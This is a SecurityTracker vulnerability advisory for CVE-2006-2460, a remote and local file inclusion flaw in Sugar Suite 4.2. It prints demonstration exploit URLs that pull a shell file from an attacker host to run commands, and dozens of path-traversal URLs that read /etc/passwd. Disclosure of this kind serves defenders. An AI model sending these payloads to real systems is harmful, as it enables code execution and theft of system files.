SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Forum/Board/Portal)  >   Sugar Suite Vendors:   SugarCRM Inc.
Sugar Suite 'sugarEntry' Globals Entry Lets Remote Users Include and Execute Arbitrary Code
SecurityTracker Alert ID:  1016087
SecurityTracker URL:  http://securitytracker.com/id/1016087
CVE Reference:   CVE-2006-2460   (Links to External Site)
Updated:  Dec 5 2009
Original Entry Date:  May 15 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 4.2
Description:   rgod reported a vulnerability in Sugar Suite. A remote user can include and execute arbitrary code on the target system.

The 'modules/OptimisticLock/LockResolve.php' script does not properly validate user-supplied input. If register_globals and allow_url_fopen are enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=http://[attacker]/someshell.txt

http://[target]/[path]/modules/Administration/RebuildAudit.php?cmd=ls%20-la&GLOBALS[sugarEntry]=1&beanFiles[1]=ftp://username:password@[attacker]/shell.txt

A remote user can also include and execute arbitrary files located on the target system if magic_quotes_gpc is disabled. The following scripts are affected:

http://[target]/[path]/modules/Administration/CustomizeFields.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Administration/Development.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Administration/DstFix.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Administration/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/include/SubPanel/SubPanelViewer.php?GLOBALS[sugarEntry]=1&module=1&record=1&beanList[1]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Accounts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Administration/Upgrade.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Bugs/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Calendar/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Calls/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/CampaignLog/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Campaigns/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Campaigns/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/CampaignTrackers/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Cases/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Contacts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Dashboard/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Documents/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Dropdown/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Dropdown/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/DynamicFields/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/EditCustomFields/EditView.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/EditCustomFields/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/EmailMan/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Emails/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/EmailTemplates/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Feeds/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Home/PopupSugar.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Leads/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/MailMerge/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Meetings/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Notes/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Opportunities/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Project/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Project/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/ProjectTask/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/ProspectLists/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Prospects/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Roles/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Tasks/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Users/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/modules/Users/Login.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00

The original advisory is available at:

http://retrogod.altervista.org/sugar_suite_42_incl_xpl.html

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sugarcrm.com/crm/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Mon, 15 May 2006 04:21:56 +0200
Subject:  Sugar Suite Open Source <= 4.2 "OptimisticLock!" arbitrary remote inclusion exploit

http://retrogod.altervista.org/sugar_suite_42_incl_xpl.html

rgod
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC